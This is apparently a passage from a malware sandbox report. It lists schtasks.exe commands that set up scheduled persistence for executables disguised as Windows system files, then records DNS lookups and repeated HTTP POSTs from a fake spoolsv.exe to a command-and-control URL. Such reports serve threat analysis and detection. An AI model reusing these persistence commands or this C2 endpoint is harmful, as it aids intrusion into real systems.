schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Security\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Music\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default\Music\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Music\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Sidebar\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Sidebar\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Desktop\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Public\Desktop\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Desktop\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BlockcontainerWinB" /sc MINUTE /mo 5 /tr "'C:\portsurrogateFontCrt\BlockcontainerWin.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BlockcontainerWin" /sc ONLOGON /tr "'C:\portsurrogateFontCrt\BlockcontainerWin.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BlockcontainerWinB" /sc MINUTE /mo 7 /tr "'C:\portsurrogateFontCrt\BlockcontainerWin.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1136

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

97.238.56.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.238.56.23.in-addr.arpa

IN PTR

Response

97.238.56.23.in-addr.arpa

IN PTR

a23-56-238-97deploystaticakamaitechnologiescom
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

237025cm.n9shteam.in

spoolsv.exe

Remote address:

8.8.8.8:53

Request

237025cm.n9shteam.in

IN A

Response

237025cm.n9shteam.in

IN A

104.21.64.1

237025cm.n9shteam.in

IN A

104.21.96.1

237025cm.n9shteam.in

IN A

104.21.80.1

237025cm.n9shteam.in

IN A

104.21.48.1

237025cm.n9shteam.in

IN A

104.21.16.1

237025cm.n9shteam.in

IN A

104.21.32.1

237025cm.n9shteam.in

IN A

104.21.112.1
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:15:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UIOmr%2FLaDOzCQ1ZUWNomvtsiXkpeZnmdCkMTS2BWluE8erjZdhQ85B2ZmcaQMqr3lKgmhuxhMJ4gioqOhWKV9CASi24r1Ke4KA%2Bp65pGRQsRZV1o971Ai2bZ86lzL8R9w%2FZayCaf%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90154fe33c1293de-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47593&min_rtt=47340&rtt_var=17933&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=668&delivery_rate=28664&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

1.64.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.64.21.104.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:15:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3l773J6UlJTxXnSIakhc2t%2B0jMcZsdbOizLiwb24CwT%2Bwrx8N2ZFqwS9z0FG3j6LBAIBe%2BJ4ADpgjoWELv%2FDoW6cA8SLBVk7VZ%2B%2BKBOt8zYoFuPP1mfi9wQ3u3v%2Fu1K%2FK20j2zxu9A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9015502cc87d7711-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47288&min_rtt=47206&rtt_var=17761&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=651&delivery_rate=28746&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

59.238.56.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.238.56.23.in-addr.arpa

IN PTR

Response

59.238.56.23.in-addr.arpa

IN PTR

a23-56-238-59deploystaticakamaitechnologiescom
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:15:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4UiEES1wWHrdQQB7356DOD2k6C5BujlD3KF%2FEsAILNw1uFvGgdgJqi3C7h0VeGPRBL5ZiW82VO6HUm4BaBKRw2gQ%2BcRt6HIIBhV6c4WRvKY2pdN%2BDYuWXoPv4qQ%2BtqsTKimioiz6g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90155075abbdef03-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47145&min_rtt=47105&rtt_var=17746&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=668&delivery_rate=28609&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 237025cm.n9shteam.in
Content-Length: 336
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:16:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1Ozfd9BiN1aquOHEfZ3vZvGnAJ6U3zk1vdRGdM09yD6Zvc9NQDHTLMxB3LXT%2FqO%2FyaHuGBB2GrZRI1rAF3UbFDvc3HpfnmLPRGdppkVQI3wldvLk9zJCFN63RJuZmj11Pr5GqpYAw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901550bfaec5ef03-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47311&min_rtt=47258&rtt_var=17828&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=643&delivery_rate=28458&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:16:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2BtQce6uqV7JbupC%2BQe8MnLBSto%2B4aL5ga6LyLB8HPgAqLct%2B7GGiZAQ2L%2B8PxyaXk4VnVfdOFaJ9wAGlkuD0lI%2BtEu2peCStwSwEHD82fj6V8L7%2FEaW3XHPIZ%2BPbzyfentiXwbBzA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90155109188e63b7-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=47644&min_rtt=47305&rtt_var=17982&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=603&delivery_rate=28686&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 237025cm.n9shteam.in
Content-Length: 336
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:16:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G8tuuvpLQUgBQLjdtFO9RUX73YkUIQlbcvfVWtEKtV700eDDOaRAiAQ1Jo3maveTAOg7DH8qXBJuzLeSV%2BqriwBqcEzVyv2h9t5hpJUxL02Mc8bORpQmJXV4dm7VdKEROF%2B7XaQTqg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901551399e74ef03-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=47238&min_rtt=47005&rtt_var=17793&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=607&delivery_rate=28869&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:16:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6pUBC0AWNyt5Cc0TTjj7J4vzsZ24WCaGRRWTezsCSKjw4zc0A6Sr1VOwhAd5AwwHcJqa16bj%2FNXj29MXgr69V86MWi17VJThbFPKIJ1jY%2BTdxsR4Ab1VRkydtJ%2FwFWVTQ%2FPXbOE%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901551834b2988a9-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47317&min_rtt=47315&rtt_var=17747&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=668&delivery_rate=28669&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:16:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JY32VQgMa2LUflczCBF44C8LEAPLwrDvOfZbdx5RpQibeq4Hy2hBNxsUAYj5IxDAMIXT2mEmP6gKj0oYhEYYSDH6goOVm8BWfzpTU1iJlNz8dOiuUIPpsoyaOKjI%2B1yxvw%2FmOp7kyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901551b45c7bef03-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47025&min_rtt=46841&rtt_var=17697&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=668&delivery_rate=28970&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:16:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RaLUvTPgONEuajdVi73RXGIbFOFJdZrS33GR23MgD%2BbLtYOkqDdt%2F301Bt6IZuiMSTSHnNz3LSndHC71cjBNjFVsUUOf28fO9b%2FBCEqY5vFw65iGi72dI68mkZU3Sv8mFTIlS1wHsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901551fdc8be63b7-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=47859&min_rtt=47183&rtt_var=19047&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=603&delivery_rate=25799&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:17:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFdI7lrF8f8%2FddD%2FCBz8jicb3Zd%2FjIYpI21fTztBuyd1uJnyjvg1HJgXir1shyTsnToYbODUdasorVCqTsf4fXHr0T8ecqPleN2rPdcvGMBbSh020YwrpxW3hafaFjcjF4wKYGeN5A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901552476e039505-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47241&min_rtt=47205&rtt_var=17728&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=668&delivery_rate=28746&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:17:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYgD6fKR66HunmzxTc8kPOJE5x5FkxMddrWSa3OMLqW1gKBsXvhZAjQrV%2FFMA%2BxYegjisU2TevEmfW%2FhKJX2PXyF9ApyVw9tdT5TlYNB9%2FnsUlhrO7x%2BnOxKZ5R8dZCSSZeALzM1Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90155290ccc2cd6b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47967&min_rtt=47164&rtt_var=18260&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=668&delivery_rate=28771&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://237025cm.n9shteam.in/UpdatesqlCdn.php

spoolsv.exe

Remote address:

104.21.64.1:80

Request

POST /UpdatesqlCdn.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 237025cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 13 Jan 2025 12:17:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0reepKn52dmIyvw5kTWLXUUz8VLVDFKkUcWYFyQXgp8SbAeQpovZfAArmHqTd%2BSqCKyrpxE0KcHI6d9EiZqktyjIN37vfLQyZ2LWAYVsIVlU5%2Fbq25rZkGbOzXVuUPofCO%2BCZ8ec2g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901552c1399563b7-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51417&min_rtt=47301&rtt_var=20678&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=668&delivery_rate=28688&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

168.117.168.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.117.168.52.in-addr.arpa

IN PTR

Response

104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

938 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

921 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

938 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

913 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

919 B
1.4kB
7
7

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

877 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

938 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

938 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

873 B
1.3kB
6
5

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

938 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

938 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404
104.21.64.1:80

http://237025cm.n9shteam.in/UpdatesqlCdn.php

http

spoolsv.exe

938 B
1.3kB
6
6

HTTP Request

POST http://237025cm.n9shteam.in/UpdatesqlCdn.php

HTTP Response

404

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

97.238.56.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

97.238.56.23.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

237025cm.n9shteam.in

dns

spoolsv.exe

66 B
178 B
1
1

DNS Request

237025cm.n9shteam.in

DNS Response

104.21.64.1

104.21.96.1

104.21.80.1

104.21.48.1

104.21.16.1

104.21.32.1

104.21.112.1
8.8.8.8:53

1.64.21.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

1.64.21.104.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

59.238.56.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

59.238.56.23.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

168.117.168.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

168.117.168.52.in-addr.arpa

